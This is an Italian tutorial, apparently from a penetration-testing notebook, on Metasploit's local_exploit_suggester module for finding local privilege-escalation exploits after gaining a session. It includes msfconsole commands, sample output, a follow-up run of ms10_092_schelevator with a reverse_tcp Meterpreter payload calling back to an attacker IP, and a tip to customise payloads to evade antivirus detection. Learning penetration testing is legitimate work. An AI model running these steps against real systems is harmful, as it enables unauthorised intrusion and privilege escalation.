📘 Guida Approfondita – Metasploit `post/multi/recon/local_exploit_suggester`
--- Il modulo localexploitsuggester analizza le informazioni di sistema su una sessione attiva Linux, Windows o macOS e propone una lista di exploit locali compatibili con la piattaforma e la configur
📘 Guida Approfondita – Metasploit post/multi/recon/local_exploit_suggester
🎯 Scopo del modulo
Il modulo local_exploit_suggester analizza le informazioni di sistema su una sessione attiva (Linux, Windows o macOS) e propone una lista di exploit locali compatibili con la piattaforma e la configurazione rilevata.
✅ Utilizzo tipico: dopo aver ottenuto una shell utente non privilegiata, per identificare vulnerabilità locali che possano portare ad una privilege escalation (SYSTEM/root).
⚙️ Requisiti preliminari
- ✅ Accesso a una sessione Meterpreter attiva
- ✅ Privilegi minimi sufficienti per interrogare il sistema (
getuid,sysinfo,uname, etc.)
- ✅ Framework Metasploit aggiornato
- ✅ Database MSF (PostgreSQL) attivo:
msfdb start
📌 Utilizzo passo passo
1. Avvio del Metasploit Framework
msfconsole2. Visualizzazione del modulo
use post/multi/recon/local_exploit_suggester3. Settaggio dei parametri richiesti
set SESSION <ID>Puoi trovare l’ID della sessione attiva con:
sessionsEsempio:
set SESSION 14. (Opzionale) Impostazioni aggiuntive
| Opzione | Descrizione |
VERBOSE true | Mostra dettagli avanzati degli exploit |
SHOWDESCRIPTION true | Mostra la descrizione di ogni exploit suggerito |
5. Esecuzione del modulo
run📤 Output tipico
L'output consisterà in una lista come questa:
[] 192.168.56.101 - Collecting local exploits for x86/windows...
[] 192.168.56.101 - 32 exploit checks are being tried...
[+] 192.168.56.101 - exploit/windows/local/ms10_015_kitrap0d: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/bypassuac: The target appears to be vulnerable. [] Post module execution completed💡 Cosa fa sotto il cofano
Il modulo esegue i seguenti step:
1. Raccolta informazioni da Meterpreter:
- OS version
- Patch level
- Kernel (in caso di Linux)
- Architettura (x86/x64)
2. Confronta i dati con i requisiti noti dei moduli exploit//local/ presenti nel framework.
3. Restituisce una lista ordinata dei moduli applicabili.
🎯 Utilizzo strategico
Dopo aver ricevuto gli exploit suggeriti:
1. Valuta la stabilità
- Cerca su Exploit-DB o direttamente nel modulo MSF (
info exploit/...)
- Verifica se è noto per causare BSOD o crash
2. Esegui l'exploit suggerito
use exploit/windows/local/ms10_092_schelevator
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <tuo_ip> run3. Verifica successo
getuid
🔐 Note di sicurezza e compatibilità
| Considerazione | Dettagli |
| 🔍 Anti-virus | Molti exploit MSF sono rilevati da AV/EDR |
| 🧪 Test preliminari | In laboratorio, verifica eventuali crash |
| ⚠️ Architettura | Alcuni exploit sono x86-only, altri x64 |
| 🧠 Attenzione a UAC | Alcuni moduli richiedono bypass UAC su Windows |
🛠 Consigli pratici
- Integra con
Windows-Exploit-Suggesterper una seconda opinione
- Se usi Linux o macOS, il modulo funziona ugualmente (con exploit compatibili)
- Personalizza il payload per evitare detection
🧩 Integrazione nei tuoi flussi operativi
✅ Può essere automatizzato in script Metasploit via resource o in moduli personalizzati
✅ Ideale da documentare nei tuoi writeup o nel tuo GitBook nella sezione _Post Exploitation_
📚 Risorse correlate
| Strumento | Descrizione |
exploit/windows/local/ | Moduli di escalation per Windows |
post/windows/gather/enum_applications | Enum di software installato |
post/windows/gather/enum_logged_on_users | Raccolta utenti attivi |
WinPEAS, Seatbelt, WES | Ottimi tool da usare in parallelo |